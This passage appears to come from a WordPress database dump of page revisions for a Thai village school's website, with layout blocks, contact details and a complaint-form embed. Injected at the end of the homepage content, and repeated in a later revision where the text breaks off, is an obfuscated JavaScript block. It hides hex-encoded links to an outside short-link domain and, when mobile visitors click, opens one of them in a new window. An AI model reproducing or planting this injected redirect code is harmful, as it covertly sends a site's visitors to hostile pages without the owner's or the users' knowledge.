900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#130b0b\",\"headingBgColor\":\"#00000000\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleWeight\":\"500\",\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#eee9da\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingBgColor\":\"#32e6a4\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนบ้านหนองปลาเข็ง-กอไหล่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">ตำบล โพธิ์ อำเภอ โนนคูณ ศรีสะเกษ 33250</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ :  093-325-2659 ผู้อำนวยการโรงเรียน</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-08-02 11:31:50','2024-08-02 04:31:50','',14,'http://pakhaeng.ssk.in.th/?p=483',0,'revision','',0),
(484,1,'2024-08-02 11:41:36','2024-08-02 04:41:36','<!-- wp:image {\"id\":1509,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353-1.png\" alt=\"\" class=\"wp-image-1509\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:html -->\n<iframe src=\"https://script.google.com/macros/s/AKfycbxEPByU7gv9jSnVVgZ9Epw9Zr5jO-O8WnCpXvsB67C6vI1y9u66n4BYnLjRvd9FT-si/exec\" width=\"100%\" height=\"600\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s 